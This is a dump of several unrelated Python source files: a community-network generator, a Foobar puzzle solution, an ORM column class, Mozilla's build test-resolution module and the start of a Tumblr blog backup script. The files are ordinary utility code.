np.zeros((N, K))\n    for i in range(N):\n        q = int(math.floor(float(i) / float(size)))\n        if q == K:\n            u[i:, K - 1] = 1.\n            v[i:, K - 1] = 1.\n        else:\n            for j in range(q * size, q * size + size):\n                u[j, q] = 1.\n                v[j, q] = 1.\n    # Generate mixed communities if requested\n    if over != 0.:\n        overlapping = int(N * over) # number of nodes belonging to more than 1 communities\n        ind_over = prng.randint(len(u), size = overlapping)\n        if L1:\n            u[ind_over] = prng.dirichlet(eta * np.ones(K), overlapping)\n            v[ind_over] = corr * u[ind_over] + (1. - corr) * prng.dirichlet(eta * np.ones(K), overlapping)\n            if corr == 1.:\n                assert np.allclose(u, v)\n            if corr > 0:\n                v = normalize_nonzero_membership(v)\n        else:\n            u[ind_over] = prng.gamma(alpha, 1. / beta, size = (overlapping, K))\n            v[ind_over] = corr * u[ind_over] + (1. - corr) * prng.gamma(alpha, 1. / beta, size = (overlapping, K))\n            u = normalize_nonzero_membership(u)\n            v = normalize_nonzero_membership(v)\n    return u, v\n
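\n\n# --- Added usage sketch (not part of the original module) ---\n# Minimal example of drawing overlapping memberships and checking that the\n# rows stay normalized (illustrative only; assumes the defaults above):\n#\n#     rng = np.random.RandomState(0)\n#     u, v = membership_vectors(rng, L1=True, K=3, N=30, corr=0.5, over=0.2)\n#     assert np.allclose(u.sum(axis=1), 1.) and np.allclose(v.sum(axis=1), 1.)\n# --- End sketch ---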
Element (k,h)\n gives the density of edges going from the nodes of group k to nodes of group h.\n \"\"\"\n\n b *= a\n p1 = K / N\n while p1 < a:\n a *= 0.1\n\n if structure == 'assortative':\n p = p1 * a * np.ones((K, K)) # secondary-probabilities\n np.fill_diagonal(p, p1 * np.ones(K)) # primary-probabilities\n\n elif structure == 'disassortative':\n p = p1 / K * np.ones((K, K)) # primary-probabilities\n np.fill_diagonal(p, a * p1 * np.ones(K)) # secondary-probabilities\n\n elif structure == 'core-periphery':\n p = p1 / K * np.ones((K, K))\n np.fill_diagonal(np.fliplr(p), a * p1)\n p[1, 1] = b * p1\n\n elif structure == 'directed-biased':\n p = a * p1 * np.ones((K, K))\n p[0, 1] = p1\n p[1, 0] = b * p1\n\n return p\n\n\ndef normalize_nonzero_membership(u):\n \"\"\"\n Given a matrix, it returns the same matrix normalized by row.\n Parameters\n ----------\n u: Numpy array\n Numpy Matrix.\n Returns\n -------\n The matrix normalized by row.\n \"\"\"\n\n den1 = u.sum(axis = 1, keepdims = True)\n nzz = den1 == 0.\n den1[nzz] = 1.\n\n return u / den1\n\n\n@jit(nopython = True)\ndef delta_scores(s):\n \"\"\"\n Compute the pairwise ranking differences.\n \"\"\"\n N = s.shape[0]\n delta_s = np.zeros((N, N))\n for i in range(N):\n for j in range(N):\n delta_s[i, j] = s[i] - s[j]\n return delta_s\n","repo_name":"liacov/XOR-rankcom","sub_path":"src/modules/XOR_generator.py","file_name":"XOR_generator.py","file_ext":"py","file_size_in_byte":21559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26311159822","text":"# Solution overview:\n# 1. Take substrings of query as a kernel\n# 2. Compare kernel for matches\n# 3. Earliest match results in more sharing (=> caring).\ndef factors(n):\n return [k for k in list(range(1, n+1)) if (n % k == 0)]\n\ndef match(kernel, vec):\n window_posn = [len(kernel)*i for i in range(int(len(vec)/len(kernel)))]\n for ix in window_posn:\n for k, asc in zip(kernel, vec[ix:ix+len(kernel)]):\n if (k - asc) != 0:\n return False\n return True\n\ndef answer(s):\n asc = [ord(c) for c in s]\n for f in factors(len(s)):\n kernel = asc[:f]\n if match(kernel, asc):\n return int(f/len(s))\n","repo_name":"tbaybay/Foobar-challenges","sub_path":"the_cake_is_a_lie.py","file_name":"the_cake_is_a_lie.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74742313706","text":"from magic_repr import make_repr\n\n__all__ = ['Column']\n\n\nclass Column:\n def __init__(\n self,\n name=None,\n type_=None,\n not_null=True,\n auto_inc=False,\n unique=False,\n pk=False,\n fk=None,\n display=False\n ):\n self.name = name\n self.type_ = type_\n self._not_null = not_null\n self.auto_inc = auto_inc\n self._unique = unique\n self.pk = pk\n self.fk = fk\n self.display = display\n\n @property\n def not_null(self):\n return self._not_null if not self.pk else True\n\n @property\n def unique(self):\n if self.pk and self.fk is None:\n return True\n return self._unique\n\n def resolve_type(self):\n self.type_ = self.fk.column.type_\n\n\nColumn.__repr__ = make_repr(\n 'name', 'type_', 'not_null', 'auto_inc', 'unique', 'pk', 'fk'\n)\n","repo_name":"SqrtMinusOne/ERMaket","sub_path":"ermaket/api/erd/rd_entities/column.py","file_name":"column.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13692485487","text":"# This Source Code Form is subject to the 
terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport json\nimport os\n\nimport mozpack.path as mozpath\n\nfrom .base import MozbuildObject\nfrom .util import OrderedDefaultDict\nfrom collections import defaultdict\n\n\ndef rewrite_test_base(test, new_base, honor_install_to_subdir=False):\n \"\"\"Rewrite paths in a test to be under a new base path.\n\n This is useful for running tests from a separate location from where they\n were defined.\n\n honor_install_to_subdir and the underlying install-to-subdir field are a\n giant hack intended to work around the restriction where the mochitest\n runner can't handle single test files with multiple configurations. This\n argument should be removed once the mochitest runner talks manifests\n (bug 984670).\n \"\"\"\n test['here'] = mozpath.join(new_base, test['dir_relpath'])\n\n if honor_install_to_subdir and test.get('install-to-subdir'):\n manifest_relpath = mozpath.relpath(test['path'],\n mozpath.dirname(test['manifest']))\n test['path'] = mozpath.join(new_base, test['dir_relpath'],\n test['install-to-subdir'], manifest_relpath)\n else:\n test['path'] = mozpath.join(new_base, test['file_relpath'])\n\n return test\n\n\nclass TestMetadata(object):\n \"\"\"Holds information about tests.\n\n This class provides an API to query tests active in the build\n configuration.\n \"\"\"\n\n def __init__(self, filename=None):\n self._tests_by_path = OrderedDefaultDict(list)\n self._tests_by_flavor = defaultdict(set)\n self._test_dirs = set()\n\n if filename:\n with open(filename, 'rt') as fh:\n d = json.load(fh)\n\n for path, tests in d.items():\n for metadata in tests:\n self._tests_by_path[path].append(metadata)\n self._test_dirs.add(os.path.dirname(path))\n\n flavor = metadata.get('flavor')\n self._tests_by_flavor[flavor].add(path)\n\n def tests_with_flavor(self, flavor):\n \"\"\"Obtain all tests having the specified flavor.\n\n This is a generator of dicts describing each test.\n \"\"\"\n\n for path in sorted(self._tests_by_flavor.get(flavor, [])):\n yield self._tests_by_path[path]\n\n def resolve_tests(self, paths=None, flavor=None, subsuite=None, under_path=None,\n tags=None):\n \"\"\"Resolve tests from an identifier.\n\n This is a generator of dicts describing each test.\n\n ``paths`` can be an iterable of values to use to identify tests to run.\n If an entry is a known test file, tests associated with that file are\n returned (there may be multiple configurations for a single file). If\n an entry is a directory, or a prefix of a directory containing tests,\n all tests in that directory are returned. If the string appears in a\n known test file, that test file is considered. If the path contains\n a wildcard pattern, tests matching that pattern are returned.\n\n If ``under_path`` is a string, it will be used to filter out tests that\n aren't in the specified path prefix relative to topsrcdir or the\n test's installed dir.\n\n If ``flavor`` is a string, it will be used to filter returned tests\n to only be the flavor specified. 
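A short, hypothetical usage example (assumes the metadata was loaded\n        from an all-tests.json file, as in TestMetadata.__init__)::\n\n            meta = TestMetadata(filename='all-tests.json')\n            shell = list(meta.resolve_tests(paths=['netwerk/'], flavor='xpcshell'))\n\n        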
A flavor is something like\n ``xpcshell``.\n\n If ``subsuite`` is a string, it will be used to filter returned tests\n to only be in the subsuite specified.\n\n If ``tags`` are specified, they will be used to filter returned tests\n to only those with a matching tag.\n \"\"\"\n if tags:\n tags = set(tags)\n\n def fltr(tests):\n for test in tests:\n if flavor:\n if (flavor == 'devtools' and test.get('flavor') != 'browser-chrome') or \\\n (flavor != 'devtools' and test.get('flavor') != flavor):\n continue\n\n if subsuite and test.get('subsuite') != subsuite:\n continue\n\n if tags and not (tags & set(test.get('tags', '').split())):\n continue\n\n if under_path \\\n and not test['file_relpath'].startswith(under_path):\n continue\n\n # Make a copy so modifications don't change the source.\n yield dict(test)\n\n paths = paths or []\n paths = [mozpath.normpath(p) for p in paths]\n if not paths:\n paths = [None]\n\n candidate_paths = set()\n\n for path in sorted(paths):\n if path is None:\n candidate_paths |= set(self._tests_by_path.keys())\n continue\n\n if '*' in path:\n candidate_paths |= {p for p in self._tests_by_path\n if mozpath.match(p, path)}\n continue\n\n # If the path is a directory, or the path is a prefix of a directory\n # containing tests, pull in all tests in that directory.\n if (path in self._test_dirs or\n any(p.startswith(path) for p in self._tests_by_path)):\n candidate_paths |= {p for p in self._tests_by_path\n if p.startswith(path)}\n continue\n\n # If it's a test file, add just that file.\n candidate_paths |= {p for p in self._tests_by_path if path in p}\n\n for p in sorted(candidate_paths):\n tests = self._tests_by_path[p]\n\n for test in fltr(tests):\n yield test\n\n\nclass TestResolver(MozbuildObject):\n \"\"\"Helper to resolve tests from the current environment to test files.\"\"\"\n\n def __init__(self, *args, **kwargs):\n MozbuildObject.__init__(self, *args, **kwargs)\n\n self._tests = TestMetadata(filename=os.path.join(self.topobjdir,\n 'all-tests.json'))\n self._test_rewrites = {\n 'a11y': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'a11y'),\n 'browser-chrome': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'browser'),\n 'jetpack-package': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'jetpack-package'),\n 'jetpack-addon': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'jetpack-addon'),\n 'chrome': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'chrome'),\n 'mochitest': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'tests'),\n 'webapprt-chrome': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'webapprtChrome'),\n 'webapprt-content': os.path.join(self.topobjdir, '_tests', 'testing',\n 'mochitest', 'webapprtContent'),\n 'web-platform-tests': os.path.join(self.topobjdir, '_tests', 'testing',\n 'web-platform'),\n 'xpcshell': os.path.join(self.topobjdir, '_tests', 'xpcshell'),\n }\n\n def resolve_tests(self, cwd=None, **kwargs):\n \"\"\"Resolve tests in the context of the current environment.\n\n This is a more intelligent version of TestMetadata.resolve_tests().\n\n This function provides additional massaging and filtering of low-level\n results.\n\n Paths in returned tests are automatically translated to the paths in\n the _tests directory under the object directory.\n\n If cwd is defined, we will limit our results to tests under the\n directory specified. 
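A hypothetical invocation (illustrative only; assumes ``resolver`` is a\n        TestResolver built from the mozbuild environment)::\n\n            tests = list(resolver.resolve_tests(paths=['dom/'],\n                                                flavor='mochitest',\n                                                cwd=os.getcwd()))\n\n        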
The directory should be defined as an absolute\n path under topsrcdir or topobjdir for it to work properly.\n \"\"\"\n rewrite_base = None\n\n if cwd:\n norm_cwd = mozpath.normpath(cwd)\n norm_srcdir = mozpath.normpath(self.topsrcdir)\n norm_objdir = mozpath.normpath(self.topobjdir)\n\n reldir = None\n\n if norm_cwd.startswith(norm_objdir):\n reldir = norm_cwd[len(norm_objdir)+1:]\n elif norm_cwd.startswith(norm_srcdir):\n reldir = norm_cwd[len(norm_srcdir)+1:]\n\n result = self._tests.resolve_tests(under_path=reldir,\n **kwargs)\n\n else:\n result = self._tests.resolve_tests(**kwargs)\n\n for test in result:\n rewrite_base = self._test_rewrites.get(test['flavor'], None)\n\n if rewrite_base:\n yield rewrite_test_base(test, rewrite_base,\n honor_install_to_subdir=True)\n else:\n yield test\n\n# These definitions provide a single source of truth for modules attempting\n# to get a view of all tests for a build. Used by the emitter to figure out\n# how to read/install manifests and by test dependency annotations in Files()\n# entries to enumerate test flavors.\n\n# While there are multiple test manifests, the behavior is very similar\n# across them. We enforce this by having common handling of all\n# manifests and outputting a single class type with the differences\n# described inside the instance.\n#\n# Keys are variable prefixes and values are tuples describing how these\n# manifests should be handled:\n#\n# (flavor, install_prefix, package_tests)\n#\n# flavor identifies the flavor of this test.\n# install_prefix is the path prefix of where to install the files in\n# the tests directory.\n# package_tests indicates whether to package test files into the test\n# package; suites that compile the test files should not install\n# them into the test package.\n#\nTEST_MANIFESTS = dict(\n A11Y=('a11y', 'testing/mochitest', 'a11y', True),\n BROWSER_CHROME=('browser-chrome', 'testing/mochitest', 'browser', True),\n ANDROID_INSTRUMENTATION=('instrumentation', 'instrumentation', '.', False),\n JETPACK_PACKAGE=('jetpack-package', 'testing/mochitest', 'jetpack-package', True),\n JETPACK_ADDON=('jetpack-addon', 'testing/mochitest', 'jetpack-addon', False),\n METRO_CHROME=('metro-chrome', 'testing/mochitest', 'metro', True),\n MOCHITEST=('mochitest', 'testing/mochitest', 'tests', True),\n MOCHITEST_CHROME=('chrome', 'testing/mochitest', 'chrome', True),\n MOCHITEST_WEBAPPRT_CONTENT=('webapprt-content', 'testing/mochitest', 'webapprtContent', True),\n MOCHITEST_WEBAPPRT_CHROME=('webapprt-chrome', 'testing/mochitest', 'webapprtChrome', True),\n WEBRTC_SIGNALLING_TEST=('steeplechase', 'steeplechase', '.', True),\n XPCSHELL_TESTS=('xpcshell', 'xpcshell', '.', True),\n)\n\n# Reftests have their own manifest format and are processed separately.\nREFTEST_FLAVORS = ('crashtest', 'reftest')\n\n# Web platform tests have their own manifest format and are processed separately.\nWEB_PATFORM_TESTS_FLAVORS = ('web-platform-tests',)\n\ndef all_test_flavors():\n return ([v[0] for v in TEST_MANIFESTS.values()] +\n list(REFTEST_FLAVORS) +\n list(WEB_PATFORM_TESTS_FLAVORS))\n","repo_name":"classilla/tenfourfox","sub_path":"python/mozbuild/mozbuild/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":11278,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"37"} +{"seq_id":"1350803211","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function, with_statement\n\n# standard Python library 
imports\nimport errno\nimport hashlib\nimport imghdr\nimport io\nimport itertools\nimport locale\nimport multiprocessing\nimport os\nimport re\nimport shutil\nimport sys\nimport threading\nimport time\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom glob import glob\nfrom multiprocessing.queues import SimpleQueue\nfrom os.path import join, split, splitext\nfrom posixpath import basename as urlbasename, join as urlpathjoin, splitext as urlsplitext\nfrom xml.sax.saxutils import escape\n\nfrom util import (ConnectionFile, LockedQueue, LogLevel, PY3, is_dns_working, make_requests_session, no_internet,\n nullcontext, to_bytes, to_unicode)\nfrom wget import HTTPError, HTTP_RETRY, HTTP_TIMEOUT, WGError, WgetRetrieveWrapper, setup_wget, touch, urlopen\n\ntry:\n from typing import TYPE_CHECKING\nexcept ImportError:\n TYPE_CHECKING = False\n\nif TYPE_CHECKING:\n from queue import Queue\n from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Text, Tuple, Type\n\n JSONDict = Dict[str, Any]\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json # type: ignore[no-redef]\n\ntry:\n import queue\nexcept ImportError:\n import Queue as queue # type: ignore[no-redef]\n\ntry:\n from urllib.parse import quote, urlencode, urlparse\nexcept ImportError:\n from urllib import quote, urlencode # type: ignore[attr-defined,no-redef]\n from urlparse import urlparse # type: ignore[no-redef]\n\ntry:\n from settings import DEFAULT_BLOGS\nexcept ImportError:\n DEFAULT_BLOGS = []\n\n# extra optional packages\ntry:\n import pyexiv2\nexcept ImportError:\n pyexiv2 = None\n\ntry:\n import yt_dlp as youtube_dl\nexcept ImportError:\n try:\n import youtube_dl\n except ImportError:\n youtube_dl = None\n\ntry:\n from bs4 import BeautifulSoup\nexcept ImportError:\n BeautifulSoup = None\n\ntry:\n import jq\nexcept ImportError:\n jq = None\n\ntry:\n from os import DirEntry, scandir # type: ignore[attr-defined]\nexcept ImportError:\n try:\n from scandir import DirEntry, scandir # type: ignore[no-redef]\n except ImportError:\n scandir = None # type: ignore[assignment,no-redef]\n\n# NB: setup_urllib3_ssl has already been called by wget\n\ntry:\n import requests\nexcept ImportError:\n if not TYPE_CHECKING:\n # Import pip._internal.download first to avoid a potential recursive import\n try:\n from pip._internal import download as _ # noqa: F401\n except ImportError:\n pass # Not absolutely necessary\n try:\n from pip._vendor import requests # type: ignore[no-redef]\n except ImportError:\n raise RuntimeError('The requests module is required. 
Please install it with pip or your package manager.')\n\n# These builtins have new names in Python 3\ntry:\n long, xrange # type: ignore[has-type]\nexcept NameError:\n long = int\n xrange = range\n\n# Format of displayed tags\nTAG_FMT = u'#{}'\n\n# Format of tag link URLs; set to None to suppress the links.\n# Named placeholders that will be replaced: domain, tag\nTAGLINK_FMT = u'https://{domain}/tagged/{tag}'\n\n# exit codes\nEXIT_SUCCESS = 0\nEXIT_NOPOSTS = 1\n# EXIT_ARGPARSE = 2 -- returned by argparse\nEXIT_INTERRUPT = 3\nEXIT_ERRORS = 4\n\n# add another JPEG recognizer\n# see http://www.garykessler.net/library/file_sigs.html\ndef test_jpg(h, f):\n if h[:3] == b'\\xFF\\xD8\\xFF' and h[3] in b'\\xDB\\xE0\\xE1\\xE2\\xE3':\n return 'jpg'\n\nimghdr.tests.append(test_jpg)\n\n# variable directory names, will be set in TumblrBackup.backup()\nsave_folder = ''\nmedia_folder = ''\n\n# constant names\nroot_folder = os.getcwd()\npost_dir = 'posts'\njson_dir = 'json'\nmedia_dir = 'media'\narchive_dir = 'archive'\ntheme_dir = 'theme'\nsave_dir = '..'\nbackup_css = 'backup.css'\ncustom_css = 'custom.css'\navatar_base = 'avatar'\ndir_index = 'index.html'\ntag_index_dir = 'tags'\n\nblog_name = ''\npost_ext = '.html'\nhave_custom_css = False\n\nPOST_TYPES = ('text', 'quote', 'link', 'answer', 'video', 'audio', 'photo', 'chat')\nTYPE_ANY = 'any'\nTAG_ANY = '__all__'\n\nMAX_POSTS = 50\nREM_POST_INC = 10\n\n# get your own API key at https://www.tumblr.com/oauth/apps\nAPI_KEY = ''\n\n# ensure the right date/time format\ntry:\n locale.setlocale(locale.LC_TIME, '')\nexcept locale.Error:\n pass\nFILE_ENCODING = 'utf-8'\nTIME_ENCODING = locale.getlocale(locale.LC_TIME)[1] or FILE_ENCODING\n\nwget_retrieve = None # type: Optional[WgetRetrieveWrapper]\ndisable_note_scraper = set() # type: Set[str]\ndisablens_lock = threading.Lock()\n\n\nclass Logger(object):\n def __init__(self):\n self.lock = threading.Lock()\n self.backup_account = None # type: Optional[str]\n self.status_msg = None # type: Optional[str]\n\n def log(self, level, msg, account=False):\n if options.quiet and level < LogLevel.WARN:\n return\n with self.lock:\n for line in msg.splitlines(True):\n self._print(line, account)\n if self.status_msg:\n self._print(self.status_msg, account=True)\n sys.stdout.flush()\n\n def info(self, msg, account=False):\n self.log(LogLevel.INFO, msg, account)\n\n def warn(self, msg, account=False):\n self.log(LogLevel.WARN, msg, account)\n\n def error(self, msg, account=False):\n self.log(LogLevel.ERROR, msg, account)\n\n def status(self, msg):\n self.status_msg = msg\n self.log(LogLevel.INFO, '')\n\n def _print(self, msg, account=False):\n if account: # Optional account prefix\n msg = '{}: {}'.format(self.backup_account, msg)\n\n # Separate terminator\n it = (i for i, c in enumerate(reversed(msg)) if c not in '\\r\\n')\n try:\n idx = len(msg) - next(it)\n except StopIteration:\n idx = 0\n msg, term = msg[:idx], msg[idx:]\n\n pad = ' ' * (80 - len(msg)) # Pad to 80 chars\n print(msg + pad + term, end='')\n\n\nlogger = Logger()\n\n\ndef mkdir(dir, recursive=False):\n if not os.path.exists(dir):\n try:\n if recursive:\n os.makedirs(dir)\n else:\n os.mkdir(dir)\n except EnvironmentError as e:\n if e.errno != errno.EEXIST:\n raise\n\n\ndef path_to(*parts):\n return join(save_folder, *parts)\n\n\ndef open_file(open_fn, parts):\n if len(parts) > 1:\n mkdir(path_to(*parts[:-1]), (len(parts) > 2))\n return open_fn(path_to(*parts))\n\n\ndef open_text(*parts):\n return open_file(\n lambda f: io.open(f, 'w', encoding=FILE_ENCODING, 
errors='xmlcharrefreplace'), parts\n )\n\n\ndef strftime(fmt, t=None):\n if t is None:\n t = time.localtime()\n s = time.strftime(fmt, t)\n return to_unicode(s, encoding=TIME_ENCODING)\n\n\ndef get_api_url(account):\n \"\"\"construct the tumblr API URL\"\"\"\n global blog_name\n blog_name = account\n if any(c in account for c in '/\\\\') or account in ('.', '..'):\n raise ValueError('Invalid blog name: {!r}'.format(account))\n if '.' not in account:\n blog_name += '.tumblr.com'\n return 'https://api.tumblr.com/v2/blog/%s/%s' % (\n blog_name, 'likes' if options.likes else 'posts'\n )\n\n\ndef set_period():\n \"\"\"Prepare the period start and end timestamps\"\"\"\n i = 0\n tm = [int(options.period[:4]), 1, 1, 0, 0, 0, 0, 0, -1]\n if len(options.period) >= 6:\n i = 1\n tm[1] = int(options.period[4:6])\n if len(options.period) == 8:\n i = 2\n tm[2] = int(options.period[6:8])\n\n def mktime(tml):\n tmt = tuple(tml) # type: Any\n return time.mktime(tmt)\n\n options.p_start = int(mktime(tm))\n tm[i] += 1\n options.p_stop = int(mktime(tm))\n\n\nclass ApiParser(object):\n session = None # type: Optional[requests.Session]\n\n def __init__(self, base, account):\n self.base = base\n self.account = account\n self.prev_resps = None # type: Optional[Tuple[str, ...]]\n self.dashboard_only_blog = None # type: Optional[bool]\n\n @classmethod\n def setup(cls):\n cls.session = make_requests_session(\n requests.Session, HTTP_RETRY, HTTP_TIMEOUT,\n not options.no_ssl_verify, options.user_agent, options.cookiefile,\n )\n\n def read_archive(self, prev_archive):\n assert scandir is not None\n\n def read_resp(path):\n with io.open(path, encoding=FILE_ENCODING) as jf:\n return json.load(jf)\n\n if options.likes:\n logger.warn('Reading liked timestamps from saved responses (may take a while)\\n', account=True)\n\n self.prev_resps = tuple(\n e.path for e in sorted(\n (e for e in scandir(join(prev_archive, 'json')) if (e.name.endswith('.json') and e.is_file())),\n key=lambda e: read_resp(e)['liked_timestamp'] if options.likes else long(e.name[:-5]),\n reverse=True,\n )\n )\n\n def apiparse(self, count, start=0, before=None):\n # type: (...) 
-> Optional[JSONDict]\n assert self.session is not None\n if self.prev_resps is not None:\n # Reconstruct the API response\n def read_post(prf):\n with io.open(prf, encoding=FILE_ENCODING) as f:\n try:\n post = json.load(f)\n except ValueError as e:\n f.seek(0)\n logger.error('{}: {}\\n{!r}\\n'.format(e.__class__.__name__, e, f.read()))\n return None\n return prf, post\n posts = map(read_post, self.prev_resps) # type: Iterable[Tuple[DirEntry[str], JSONDict]]\n if before is not None:\n posts = itertools.dropwhile(\n lambda pp: pp[1]['liked_timestamp' if options.likes else 'timestamp'] >= before,\n posts,\n )\n posts = list(itertools.islice(posts, start, start + count))\n return {'posts': [post for prf, post in posts],\n 'post_respfiles': [prf for prf, post in posts],\n 'blog': dict(posts[0][1]['blog'] if posts else {}, posts=len(self.prev_resps))}\n\n if self.dashboard_only_blog:\n base = 'https://www.tumblr.com/svc/indash_blog'\n params = {'tumblelog_name_or_id': self.account, 'post_id': '', 'limit': count,\n 'should_bypass_safemode': 'true', 'should_bypass_tagfiltering': 'true'}\n headers = {\n 'Referer': 'https://www.tumblr.com/dashboard/blog/' + self.account,\n 'X-Requested-With': 'XMLHttpRequest',\n } # type: Optional[Dict[str, str]]\n else:\n base = self.base\n params = {'api_key': API_KEY, 'limit': count, 'reblog_info': 'true'}\n headers = None\n if before is not None:\n params['before'] = before\n elif start > 0:\n params['offset'] = start\n\n sleep_dur = 30 # in seconds\n while True:\n doc = self._get_resp(base, params, headers)\n if doc is None:\n return None\n status = doc['meta']['status']\n if status != 429:\n break\n time.sleep(sleep_dur)\n sleep_dur *= 2\n if status != 200:\n # Detect dashboard-only blogs by the error codes\n if self.dashboard_only_blog is None and status == 404:\n errors = doc.get('errors', ())\n if len(errors) == 1 and errors[0].get('code') == 4012:\n self.dashboard_only_blog = True\n logger.info('Found dashboard-only blog, trying svc API\\n', account=True)\n return self.apiparse(count, start) # Recurse once\n logger.error('API response has non-200 status:\\n{}\\n'.format(doc))\n if status == 401 and self.dashboard_only_blog:\n logger.error(\"This is a dashboard-only blog, so you probably don't have the right cookies.{}\\n\".format(\n '' if options.cookiefile else ' Try --cookiefile.',\n ))\n return None\n if self.dashboard_only_blog:\n with disablens_lock:\n if self.account not in disable_note_scraper:\n disable_note_scraper.add(self.account)\n logger.warn('[Note Scraper] Dashboard-only blog - scraping disabled for {}\\n'.format(self.account))\n elif self.dashboard_only_blog is None:\n # If the first API request succeeds, it's a public blog\n self.dashboard_only_blog = False\n\n resp = doc.get('response')\n if resp is not None and self.dashboard_only_blog:\n # svc API doesn't return blog info, steal it from the first post\n resp['blog'] = resp['posts'][0]['blog'] if resp['posts'] else {}\n return resp\n\n def _get_resp(self, base, params, headers):\n assert self.session is not None\n while True:\n try:\n with self.session.get(base, params=params, headers=headers) as resp:\n if not (200 <= resp.status_code < 300 or 400 <= resp.status_code < 500):\n logger.error('URL is {}?{}\\nError retrieving API repsonse: HTTP {} {}\\n'.format(\n base, urlencode(params), resp.status_code, resp.reason,\n ))\n return None\n ctype = resp.headers.get('Content-Type')\n if ctype and ctype.split(';', 1)[0].strip() != 'application/json':\n logger.error(\"Unexpected Content-Type: 
'{}'\\n\".format(ctype))\n return None\n try:\n return resp.json()\n except ValueError as e:\n logger.error('{}: {}\\n{} {} {}\\n{!r}\\n'.format(\n e.__class__.__name__, e, resp.status_code, resp.reason, ctype, resp.content.decode('utf-8'),\n ))\n return None\n except (EnvironmentError, HTTPError) as e:\n if isinstance(e, HTTPError) and not is_dns_working(timeout=5):\n no_internet.signal()\n continue\n logger.error('URL is {}?{}\\nError retrieving API repsonse: {}\\n'.format(base, urlencode(params), e))\n return None\n\n\ndef add_exif(image_name, tags):\n assert pyexiv2 is not None\n try:\n metadata = pyexiv2.ImageMetadata(image_name)\n metadata.read()\n except EnvironmentError:\n logger.error('Error reading metadata for image {}\\n'.format(image_name))\n return\n KW_KEY = 'Iptc.Application2.Keywords'\n if '-' in options.exif: # remove all tags\n if KW_KEY in metadata.iptc_keys:\n del metadata[KW_KEY]\n else: # add tags\n if KW_KEY in metadata.iptc_keys:\n tags |= set(metadata[KW_KEY].value)\n tags = [tag.strip().lower() for tag in tags | options.exif if tag]\n metadata[KW_KEY] = pyexiv2.IptcTag(KW_KEY, tags)\n try:\n metadata.write()\n except EnvironmentError:\n logger.error('Writing metadata failed for tags: {} in: {}\\n'.format(tags, image_name))\n\n\ndef save_style():\n with open_text(backup_css) as css:\n css.write(u'''\\\n@import url(\"override.css\");\n\nbody { width: 720px; margin: 0 auto; }\nbody > footer { padding: 1em 0; }\nheader > img { float: right; }\nimg { max-width: 720px; }\nblockquote { margin-left: 0; border-left: 8px #999 solid; padding: 0 24px; }\n.archive h1, .subtitle, article { padding-bottom: 0.75em; border-bottom: 1px #ccc dotted; }\narticle[class^=\"liked-\"] { background-color: #f0f0f8; }\n.post a.llink { display: none; }\nheader a, footer a { text-decoration: none; }\nfooter, article footer a { font-size: small; color: #999; }\n''')\n\n\ndef get_avatar(prev_archive):\n if prev_archive is not None:\n # Copy old avatar, if present\n avatar_glob = glob(join(prev_archive, theme_dir, avatar_base + '.*'))\n if avatar_glob:\n src = avatar_glob[0]\n path_parts = (theme_dir, split(src)[-1])\n cpy_res = maybe_copy_media(prev_archive, path_parts)\n if cpy_res:\n return # We got the avatar\n\n url = 'https://api.tumblr.com/v2/blog/%s/avatar' % blog_name\n avatar_dest = avatar_fpath = open_file(lambda f: f, (theme_dir, avatar_base))\n\n # Remove old avatars\n if glob(join(theme_dir, avatar_base + '.*')):\n return # Do not clobber\n\n def adj_bn(old_bn, f):\n # Give it an extension\n image_type = imghdr.what(f)\n if image_type:\n return avatar_fpath + '.' 
+ image_type\n return avatar_fpath\n\n # Download the image\n assert wget_retrieve is not None\n try:\n wget_retrieve(url, avatar_dest, adjust_basename=adj_bn)\n except WGError as e:\n e.log()\n\n\ndef get_style(prev_archive):\n \"\"\"Get the blog's CSS by brute-forcing it from the home page.\n The v2 API has no method for getting the style directly.\n See https://groups.google.com/d/msg/tumblr-api/f-rRH6gOb6w/sAXZIeYx5AUJ\"\"\"\n if prev_archive is not None:\n # Copy old style, if present\n path_parts = (theme_dir, 'style.css')\n cpy_res = maybe_copy_media(prev_archive, path_parts)\n if cpy_res:\n return # We got the style\n\n url = 'https://%s/' % blog_name\n try:\n resp = urlopen(url)\n page_data = resp.data\n except HTTPError as e:\n logger.error('URL is {}\\nError retrieving style: {}\\n'.format(url, e))\n return\n for match in re.findall(br'(?s)<style type=.text/css.>(.*?)</style>', page_data):\n css = match.strip().decode('utf-8', errors='replace')\n if '\\n' not in css:\n continue\n css = css.replace('\\r', '').replace('\\n ', '\\n')\n with open_text(theme_dir, 'style.css') as f:\n f.write(css + '\\n')\n return\n\n\n# Copy media file, if present in prev_archive\ndef maybe_copy_media(prev_archive, path_parts):\n if prev_archive is None:\n return False # Source does not exist\n\n srcpath = join(prev_archive, *path_parts)\n dstpath = open_file(lambda f: f, path_parts)\n\n if PY3:\n try:\n srcf = io.open(srcpath, 'rb')\n except EnvironmentError as e:\n if getattr(e, 'errno', None) not in (errno.ENOENT, errno.EISDIR):\n raise\n return False # Source does not exist (Python 3)\n else:\n srcf = nullcontext()\n\n with srcf:\n if PY3:\n src = srcf.fileno() # pytype: disable=attribute-error\n def dup(fd): return os.dup(fd)\n else:\n src = srcpath\n def dup(fd): return fd\n\n try:\n src_st = 